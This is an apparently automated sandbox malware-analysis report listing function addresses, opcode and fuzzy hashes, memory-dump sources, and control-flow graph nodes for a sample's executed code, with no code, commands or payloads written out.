                                            • Snapshot File: hcaresult_46_2_7ffd9b890000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 52a3a66440787c2d875da94bd7251ba8d6e93c4fc3dd5f9f25a3c119fc4ee598
                                            • Instruction ID: 2f7de80380b1687e11085d67b19aa80f5f086191f4294edb1713657d7b1aab9c
                                            • Opcode Fuzzy Hash: 52a3a66440787c2d875da94bd7251ba8d6e93c4fc3dd5f9f25a3c119fc4ee598
                                            • Instruction Fuzzy Hash: 6FC1F172A09A8D8FEB59DB68D8653E97FF1FF58304F04027AD049D72E6DE7828018741
                                            Function 00007FFD9B89C4B6 Relevance: 1.3, Strings: 1, Instructions: 48COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000002E.00000002.2590915723.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_46_2_7ffd9b890000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: >
                                            • API String ID: 0-325317158
                                            • Opcode ID: 21cff120376562f1612649c8e90d5fce3a5e69d5295b89b098da14a2c6347bbd
                                            • Instruction ID: ac630a0fd040a667ec16f570e03f0da6c5633a172bc4e141fb86f50cc9a60600
                                            • Opcode Fuzzy Hash: 21cff120376562f1612649c8e90d5fce3a5e69d5295b89b098da14a2c6347bbd
                                            • Instruction Fuzzy Hash: 4D21BD70A0951E8FEF64EF94C8A87A976B1FB58300F1101F9C40EA3291CB796B84CF50
                                            Function 00007FFD9B890A19 Relevance: .3, Instructions: 283COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000002E.00000002.2590915723.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_46_2_7ffd9b890000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 002ff0dfdb11bc8812b509e799142451b613be58f33165a7368c3ee23d139222
                                            • Instruction ID: 05430e2934d2e9936b5f12a45cc3c6848c0fc923848589b871173131c9e5f833
                                            • Opcode Fuzzy Hash: 002ff0dfdb11bc8812b509e799142451b613be58f33165a7368c3ee23d139222
                                            • Instruction Fuzzy Hash: 4B711A11F2EB4E0AEB68667C08652B57AC2EF99B15F26027DE4DFC32E7DC1C69074241
                                            Function 00007FFD9B891AFD Relevance: .3, Instructions: 273COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000002E.00000002.2590915723.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_46_2_7ffd9b890000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6c7f904013228460f86cca36c2455463e59f3e2f6172051c1ae373fb3bd8a1df
                                            • Instruction ID: 1621beeeed2a3e2c4893ba92a34ef83eebe5ebf9ce4f5113ccefc4be9d75af7f
                                            • Opcode Fuzzy Hash: 6c7f904013228460f86cca36c2455463e59f3e2f6172051c1ae373fb3bd8a1df
                                            • Instruction Fuzzy Hash: F0A19E71B18A8D8FEB99DB68D8657E97FF1FF58300F40027AD049D32A6DE7828028741
                                            Function 00007FFD9B890868 Relevance: .2, Instructions: 169COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000002E.00000002.2590915723.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_46_2_7ffd9b890000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e515835e798012d9ee8147082d862b71ea3c5701a961e0705e472ca7cbcab274
                                            • Instruction ID: a420bb48174fe76c41a6c40c783de852440ab82435b5f6a9481ff8fce08120ec
                                            • Opcode Fuzzy Hash: e515835e798012d9ee8147082d862b71ea3c5701a961e0705e472ca7cbcab274
                                            • Instruction Fuzzy Hash: 36413832B1DA588FDB65DB7C88586BA7BE1FF5C301B05017AE09ED72A2DE20E8018741
                                            Function 00007FFD9B891295 Relevance: .2, Instructions: 152COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000002E.00000002.2590915723.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_46_2_7ffd9b890000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 275e1e3143f82f191f2f7b8f982ab17ce6affb9817a8eedbdf8d6e9524b282d5
                                            • Instruction ID: 6b0aaabae6d95cb8a2e9ba089e354798fd283d15b75038f2d93261fbe9348c91
                                            • Opcode Fuzzy Hash: 275e1e3143f82f191f2f7b8f982ab17ce6affb9817a8eedbdf8d6e9524b282d5
                                            • Instruction Fuzzy Hash: 66417F31E08A5D8FDB58EFA8E855AEDBBB0FF58314F10017AD409D729ADE346841C780
                                            Function 00007FFD9B8912B0 Relevance: .1, Instructions: 138COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000002E.00000002.2590915723.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_46_2_7ffd9b890000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f4743abc9eb0ae4cb6fdaa9ad4ec6e64860911c6403df18c98e8569c17ff0cef
                                            • Instruction ID: 973dfd87b357cfc17ee754f0d2ebf3cb21ad6af17c1641cd1bd32beae17fe998
                                            • Opcode Fuzzy Hash: f4743abc9eb0ae4cb6fdaa9ad4ec6e64860911c6403df18c98e8569c17ff0cef
                                            • Instruction Fuzzy Hash: 3A414F71E18A1D8FDB58EFA8E855AED77B1FF58314F10017AE40DD329ADE3468418780
                                            Function 00007FFD9B895025 Relevance: .1, Instructions: 113COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000002E.00000002.2590915723.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_46_2_7ffd9b890000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4ba0cf7917f6f3978f72a49e71ea5ab6cc2325c43694db914fba32d968a58a95
                                            • Instruction ID: 21928200d87684501f93b6276340dd51482c4bdaf0f6af9dfec3654b81bcdd59
                                            • Opcode Fuzzy Hash: 4ba0cf7917f6f3978f72a49e71ea5ab6cc2325c43694db914fba32d968a58a95
                                            • Instruction Fuzzy Hash: 7E41FD75A1861D8FDFA4DF14C865AEDB7B0EB68305F1001EAC00EE32A5DB745A808F41
                                            Function 00007FFD9B8912E8 Relevance: .1, Instructions: 113COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000002E.00000002.2590915723.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_46_2_7ffd9b890000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 22a8caa3f0ca2a84a3f5ada2707f6949d2d0bfb1af0fd2e3c6e12c51b2720405
                                            • Instruction ID: 638ec0682dfad4843862e5122136271fa8d28e5bd818cba726476f48acf89ef6
                                            • Opcode Fuzzy Hash: 22a8caa3f0ca2a84a3f5ada2707f6949d2d0bfb1af0fd2e3c6e12c51b2720405
                                            • Instruction Fuzzy Hash: F8410A30A1895D8FDB94EF98C895AEDBBF1FF58311F10017AE409E3299DA34A841CB51
                                            Function 00007FFD9B890838 Relevance: .1, Instructions: 95COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000002E.00000002.2590915723.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_46_2_7ffd9b890000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ead074bf843052163ef75696a8515894bc2756c13393fa3f0e0da75e9bccb7a0
                                            • Instruction ID: f7b7d9806d02fffb79549a33fd843a542236367180b2d9243f76eca5b43641fd
                                            • Opcode Fuzzy Hash: ead074bf843052163ef75696a8515894bc2756c13393fa3f0e0da75e9bccb7a0
                                            • Instruction Fuzzy Hash: 3F214232A1E3A84FD711BB7C68594EF3FE0EF49229B04027FE4D9C7193D92490468381
                                            Function 00007FFD9B891575 Relevance: .1, Instructions: 94COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000002E.00000002.2590915723.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_46_2_7ffd9b890000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ef7bb0604fc07b8884a525daeca56b5790f9b39a5d6210b147b67852b3085505
                                            • Instruction ID: 0fe7fcf520d4bdd4af3fffd4e32eae1e18131d7cf7822e4fdba52c363e0fcabe
                                            • Opcode Fuzzy Hash: ef7bb0604fc07b8884a525daeca56b5790f9b39a5d6210b147b67852b3085505
                                            • Instruction Fuzzy Hash: D031F531F0D69E9BDB12BBA8CC252EDBB70EF45311F064177D025C72D2DA3866068B51
                                            Function 00007FFD9B895193 Relevance: .1, Instructions: 81COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000002E.00000002.2590915723.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_46_2_7ffd9b890000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 581ea3a1ff77e02bf2b4468974dc417795d94d989733e73bccacd207f4bdd36d
                                            • Instruction ID: 4965e4efa71864662df8f2371af3d8df0da7792b05cf34f1b071e1b00d8ace4b
                                            • Opcode Fuzzy Hash: 581ea3a1ff77e02bf2b4468974dc417795d94d989733e73bccacd207f4bdd36d
                                            • Instruction Fuzzy Hash: 7D318D35A1891D8FDF94EF04C865AEDB7B1FB64309F1001EA900EE3265DB719A818F41
                                            Function 00007FFD9B891588 Relevance: .1, Instructions: 65COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000002E.00000002.2590915723.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_46_2_7ffd9b890000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7a15277283f7c5b2422859f6facb712cb0a255a31815fc77d4c4577d79456001
                                            • Instruction ID: 326145fd89f9dc5ae6b855053ad5520c1e067b09721977a5cdb85197ca8cc454
                                            • Opcode Fuzzy Hash: 7a15277283f7c5b2422859f6facb712cb0a255a31815fc77d4c4577d79456001
                                            • Instruction Fuzzy Hash: 3E11C831B0D69E9FDB13B7B8CC202D9BB70EB46311F0A45B3D051D71D2DA34661A8791
                                            Function 00007FFD9B89070D Relevance: .1, Instructions: 60COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000002E.00000002.2590915723.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_46_2_7ffd9b890000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9345771a6058d02c0fb114e62aa4b961d43f72553e9ad2a813fb662d8c17a064
                                            • Instruction ID: c978c08fd2970c0d7a2e3e4855ffb8ce55dbfe6bb0e8dbe95be10d7deef84a65
                                            • Opcode Fuzzy Hash: 9345771a6058d02c0fb114e62aa4b961d43f72553e9ad2a813fb662d8c17a064
                                            • Instruction Fuzzy Hash: CC115E30E2950E9BEB61FFE899596FD7BE0FF18304F110476E41CC21A4DE3862948A51
                                            Function 00007FFD9B891598 Relevance: .1, Instructions: 53COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000002E.00000002.2590915723.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_46_2_7ffd9b890000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c40a6a01ede47f85abe1ced5db19077c2ab4b02da0aa95f3cb79f6e7ec64aaa4
                                            • Instruction ID: e0cf8cf42598b6831619c288cf871b267ccd3f64e1a741329e6c1d9e09a1e477
                                            • Opcode Fuzzy Hash: c40a6a01ede47f85abe1ced5db19077c2ab4b02da0aa95f3cb79f6e7ec64aaa4
                                            • Instruction Fuzzy Hash: 9C11E531F0E69E9FDB13ABA4CC206E97B70EB46310F0A46B3D011C71E2DA386619C791
                                            Function 00007FFD9B8915A0 Relevance: .0, Instructions: 47COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000002E.00000002.2590915723.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_46_2_7ffd9b890000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4cd9a74c9bd9d069651652fe3838d77db24bdd9564409df066d9d752216112e1
                                            • Instruction ID: 560b7a2a2d98851ecde4df481af25b88166322a91a7f398170d8259c182c5dbc
                                            • Opcode Fuzzy Hash: 4cd9a74c9bd9d069651652fe3838d77db24bdd9564409df066d9d752216112e1
                                            • Instruction Fuzzy Hash: 7B01C431E0E29A9FDB12A7A4CC246EA7B70EB07310F0A46A3D011C71E6DE386619C751
                                            Function 00007FFD9B890730 Relevance: .0, Instructions: 30COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000002E.00000002.2590915723.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_46_2_7ffd9b890000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9a4978961df356ceb98c9a399b5b900cf6f4115811c32831c7b903cbea8bf6ee
                                            • Instruction ID: d84862db9e0c5f44f61405cfd53eaa97b13b2e3141c45a9887deeb1309f6bb96
                                            • Opcode Fuzzy Hash: 9a4978961df356ceb98c9a399b5b900cf6f4115811c32831c7b903cbea8bf6ee
                                            • Instruction Fuzzy Hash: B6F0123091590D9FDB50EFA4C4596ED7BE0FF58305F41057AE81CC21A4DA34A6A4CB81
                                            Function 00007FFD9B891745 Relevance: .0, Instructions: 28COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000002E.00000002.2590915723.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_46_2_7ffd9b890000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0cb70c03a83d0962528513cb26f4e4b423e517bcc630d9fa6e702210a7b24b11
                                            • Instruction ID: a647bfc4705b302ee0d7b1d4897c8ff9e7954fe3dc0ae7ab8ed155f310245307
                                            • Opcode Fuzzy Hash: 0cb70c03a83d0962528513cb26f4e4b423e517bcc630d9fa6e702210a7b24b11
                                            • Instruction Fuzzy Hash: 87F03034A1950DEFDB64EF98E911AEE77A0FF04304F000075F41DC3195DA34A665DB91
                                            Function 00007FFD9B89CC31 Relevance: .0, Instructions: 24COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000002E.00000002.2590915723.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_46_2_7ffd9b890000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9856c0f5f889e54d9ab1eae24855dcd4b8e65d3d3c80de9b50cd88ec0c1ab41b
                                            • Instruction ID: 4efd6c040025c7c68693793b6d8ff1ad941d349f347887d96671fdd531a8fffb
                                            • Opcode Fuzzy Hash: 9856c0f5f889e54d9ab1eae24855dcd4b8e65d3d3c80de9b50cd88ec0c1ab41b
                                            • Instruction Fuzzy Hash: 13F0FE71E1555E8AEBA4DF18C8656FE6AB1FF84344F0141F6901D931A6DE342E818B41

                                            Execution Graph

                                            Execution Coverage:4.9%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:0%
                                            Total number of Nodes:6
                                            Total number of Limit Nodes:0
                                            execution_graph 18534 7ffd9b8a26fe 18535 7ffd9b8a270d VirtualProtect 18534->18535 18537 7ffd9b8a284d 18535->18537 18530 7ffd9b8a40ed 18531 7ffd9b8a410f VirtualAlloc 18530->18531 18533 7ffd9b8a4225 18531->18533

                                            Executed Functions

                                            Function 00007FFD9B89FB69 Relevance: 3.8, Strings: 2, Instructions: 1339COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B89C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B89C000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b89c000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ((N$+g=
                                            • API String ID: 0-3603062946
                                            • Opcode ID: 2815d39815dcf6dd011081b066313c267c4ba24e433ba0003c1beff8ca1954f3
                                            • Instruction ID: 901fbfb39202165842719c885eddc5d9967431254bd195a79c8a07b1a302b86a
                                            • Opcode Fuzzy Hash: 2815d39815dcf6dd011081b066313c267c4ba24e433ba0003c1beff8ca1954f3
                                            • Instruction Fuzzy Hash: 6EC2C470E19A1D8FDBA8DB58C895BACB7B1FF59300F1041E9D01DE72A5DA34AA81CF50
                                            Function 00007FFD9B8AAB7D Relevance: 1.8, Instructions: 1819COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 215 7ffd9b8aab7d-7ffd9b8aabb8 216 7ffd9b8aabba 215->216 217 7ffd9b8aabbf-7ffd9b8aac1f 215->217 216->217 221 7ffd9b8aac2d-7ffd9b8aac3c 217->221 222 7ffd9b8aac21 217->222 223 7ffd9b8aac3e 221->223 224 7ffd9b8aac43-7ffd9b8aac4c 221->224 222->221 223->224 225 7ffd9b8aac79-7ffd9b8aacd4 224->225 226 7ffd9b8aac4e-7ffd9b8aac5d 224->226 236 7ffd9b8aacd6 225->236 237 7ffd9b8aacdb-7ffd9b8aad35 225->237 227 7ffd9b8aac5f 226->227 228 7ffd9b8aac64-7ffd9b8ac5e5 call 7ffd9b8ad806 226->228 227->228 235 7ffd9b8ac5f0-7ffd9b8ac607 228->235 240 7ffd9b8ac612-7ffd9b8ac6b0 235->240 236->237 246 7ffd9b8aad37-7ffd9b8aad78 237->246 247 7ffd9b8aad83-7ffd9b8aaf74 237->247 256 7ffd9b8ac6b2 240->256 246->247 272 7ffd9b8abc5e-7ffd9b8abc6b 247->272 256->256 273 7ffd9b8aaf79-7ffd9b8aaf87 272->273 274 7ffd9b8abc71-7ffd9b8abcb3 272->274 275 7ffd9b8aaf89 273->275 276 7ffd9b8aaf8e-7ffd9b8ab0e2 273->276 283 7ffd9b8abd70-7ffd9b8abd76 274->283 275->276 322 7ffd9b8ab12f-7ffd9b8ab140 276->322 323 7ffd9b8ab0e4-7ffd9b8ab129 276->323 285 7ffd9b8abcb8-7ffd9b8abd15 283->285 286 7ffd9b8abd7c-7ffd9b8abdbe 283->286 297 7ffd9b8abd17-7ffd9b8abd1b 285->297 298 7ffd9b8abd42-7ffd9b8abd6d 285->298 296 7ffd9b8ac00c-7ffd9b8ac012 286->296 301 7ffd9b8ac018-7ffd9b8ac071 296->301 302 7ffd9b8abdc3-7ffd9b8abe5c 296->302 297->298 300 7ffd9b8abd1d-7ffd9b8abd3f 297->300 298->283 300->298 310 7ffd9b8ac077-7ffd9b8ac0c3 301->310 311 7ffd9b8ac100-7ffd9b8ac157 301->311 330 7ffd9b8abe67-7ffd9b8abf0b 302->330 310->311 335 7ffd9b8ac5b7-7ffd9b8ac5bd 311->335 328 7ffd9b8ab199-7ffd9b8ab1e2 322->328 329 7ffd9b8ab142-7ffd9b8ab196 322->329 323->322 349 7ffd9b8ab1e4-7ffd9b8ab1ec 328->349 350 7ffd9b8ab1f1-7ffd9b8ab1fd 328->350 329->328 362 7ffd9b8abf9d-7ffd9b8abfa1 330->362 363 7ffd9b8abf11-7ffd9b8abf9b 330->363 339 7ffd9b8ac15c-7ffd9b8ac1fa 335->339 340 7ffd9b8ac5c3-7ffd9b8ac5ef call 7ffd9b8ad806 335->340 372 7ffd9b8ac1fc-7ffd9b8ac21f 339->372 373 7ffd9b8ac22a-7ffd9b8ac239 339->373 340->235 354 7ffd9b8abc49-7ffd9b8abc5b 349->354 356 7ffd9b8ab256-7ffd9b8ab29f 350->356 357 7ffd9b8ab1ff-7ffd9b8ab253 350->357 354->272 385 7ffd9b8ab2ae-7ffd9b8ab35c 356->385 386 7ffd9b8ab2a1-7ffd9b8ab2a9 356->386 357->356 365 7ffd9b8abfd7-7ffd9b8abfea 362->365 366 7ffd9b8abfa3-7ffd9b8abfd5 362->366 376 7ffd9b8abfeb-7ffd9b8ac009 363->376 365->376 366->376 372->373 379 7ffd9b8ac23b 373->379 380 7ffd9b8ac240-7ffd9b8ac24f 373->380 376->296 379->380 383 7ffd9b8ac264-7ffd9b8ac27f 380->383 384 7ffd9b8ac251-7ffd9b8ac25f 380->384 390 7ffd9b8ac29f-7ffd9b8ac58b 383->390 391 7ffd9b8ac281-7ffd9b8ac29b 383->391 389 7ffd9b8ac596-7ffd9b8ac5b4 384->389 406 7ffd9b8ab36b-7ffd9b8ab377 385->406 407 7ffd9b8ab35e-7ffd9b8ab366 385->407 386->354 389->335 390->389 391->390 409 7ffd9b8ab379-7ffd9b8ab3cd 406->409 410 7ffd9b8ab3d0-7ffd9b8ab419 406->410 407->354 409->410 417 7ffd9b8ab428-7ffd9b8ab434 410->417 418 7ffd9b8ab41b-7ffd9b8ab423 410->418 420 7ffd9b8ab436-7ffd9b8ab48a 417->420 421 7ffd9b8ab48d-7ffd9b8ab4d6 417->421 418->354 420->421 428 7ffd9b8ab4d8-7ffd9b8ab4e0 421->428 429 7ffd9b8ab4e5-7ffd9b8ab593 421->429 428->354 437 7ffd9b8ab595-7ffd9b8ab59d 429->437 438 7ffd9b8ab5a2-7ffd9b8ab650 429->438 437->354 446 7ffd9b8ab65f-7ffd9b8ab70d 438->446 447 7ffd9b8ab652-7ffd9b8ab65a 438->447 455 7ffd9b8ab71c-7ffd9b8ab7ca 446->455 456 7ffd9b8ab70f-7ffd9b8ab717 446->456 447->354 464 7ffd9b8ab7cc-7ffd9b8ab7d4 455->464 465 7ffd9b8ab7d9-7ffd9b8ab887 455->465 456->354 464->354 473 7ffd9b8ab896-7ffd9b8ab944 465->473 474 7ffd9b8ab889-7ffd9b8ab891 465->474 478 7ffd9b8ab946-7ffd9b8ab94e 473->478 479 7ffd9b8ab953-7ffd9b8aba01 473->479 474->354 478->354 487 7ffd9b8aba10-7ffd9b8aba1b 479->487 488 7ffd9b8aba03-7ffd9b8aba0b 479->488 490 7ffd9b8aba87-7ffd9b8ababe 487->490 491 7ffd9b8aba1d-7ffd9b8aba86 487->491 488->354 495 7ffd9b8abac0-7ffd9b8abac8 490->495 496 7ffd9b8abacd-7ffd9b8abb7b 490->496 491->490 495->354 507 7ffd9b8abb8a-7ffd9b8abc38 496->507 508 7ffd9b8abb7d-7ffd9b8abb85 496->508 516 7ffd9b8abc3a-7ffd9b8abc42 507->516 517 7ffd9b8abc44-7ffd9b8abc46 507->517 508->354 516->354 517->354
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8AA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b8aa000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9d6a3baa8d0c48621f0346578e424086819423fee60da16d3690f0e8b4a96139
                                            • Instruction ID: 6a76cde2bc6814c2e36900df3f2006d5b49c33f4217833fc2116d943e4a20e97
                                            • Opcode Fuzzy Hash: 9d6a3baa8d0c48621f0346578e424086819423fee60da16d3690f0e8b4a96139
                                            • Instruction Fuzzy Hash: 5AF2FE70E19A5D8FDBA8EB58C865BA8B7F1FB58300F5041FAD00DD32A1DA346A85CF51
                                            Function 00007FFD9B891A35 Relevance: .3, Instructions: 346COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 621 7ffd9b891a35-7ffd9b891aa8 628 7ffd9b891aaa-7ffd9b891ad0 621->628 629 7ffd9b891b02-7ffd9b891b49 621->629 628->629 635 7ffd9b891b4b 629->635 636 7ffd9b891b50-7ffd9b891d26 call 7ffd9b890838 629->636 635->636 661 7ffd9b891d28-7ffd9b891d33 636->661 662 7ffd9b891d3b-7ffd9b891dbc 661->662 665 7ffd9b891dc5-7ffd9b891e2c 662->665 666 7ffd9b891dbe-7ffd9b891dc4 662->666 666->665
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b890000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2f82a3dba5faae3157dd7383d662aa3767e3ae8ff71f9bacc4b7889d23cce0e4
                                            • Instruction ID: 14a4aff8728b3fdf181f62f8c8fa33e9fdc1c8dfff75cb2774d0aa9e83cfd20c
                                            • Opcode Fuzzy Hash: 2f82a3dba5faae3157dd7383d662aa3767e3ae8ff71f9bacc4b7889d23cce0e4
                                            • Instruction Fuzzy Hash: 15C11571A09A8D9FEB58EB68D8657E97FE1FF58304F0401BEC049D72E2DA782806C741
                                            Function 00007FFD9B8A26FE Relevance: 1.7, APIs: 1, Instructions: 190memoryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 518 7ffd9b8a26fe-7ffd9b8a270b 519 7ffd9b8a2716-7ffd9b8a2727 518->519 520 7ffd9b8a270d-7ffd9b8a2715 518->520 521 7ffd9b8a2729-7ffd9b8a2731 519->521 522 7ffd9b8a2732-7ffd9b8a284b VirtualProtect 519->522 520->519 521->522 526 7ffd9b8a284d 522->526 527 7ffd9b8a2853-7ffd9b8a28a3 522->527 526->527
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B8A2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A2000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b8a2000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID: ProtectVirtual
                                            • String ID:
                                            • API String ID: 544645111-0
                                            • Opcode ID: 198bee5b9da0cc862c274c45d8660b44b51d71d8ffd62e6f03421cceac61c8b0
                                            • Instruction ID: a8b198d7e7f4ad86ba04c7933f2cfb1f03470810241ae8354a7d8e091286b596
                                            • Opcode Fuzzy Hash: 198bee5b9da0cc862c274c45d8660b44b51d71d8ffd62e6f03421cceac61c8b0
                                            • Instruction Fuzzy Hash: 50516C30D0864D8FDB58DFA8C885BE9BBF1FF5A310F1042AAD449E3255DB74A985CB80
                                            Function 00007FFD9B8A40ED Relevance: 1.4, APIs: 1, Instructions: 187memoryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
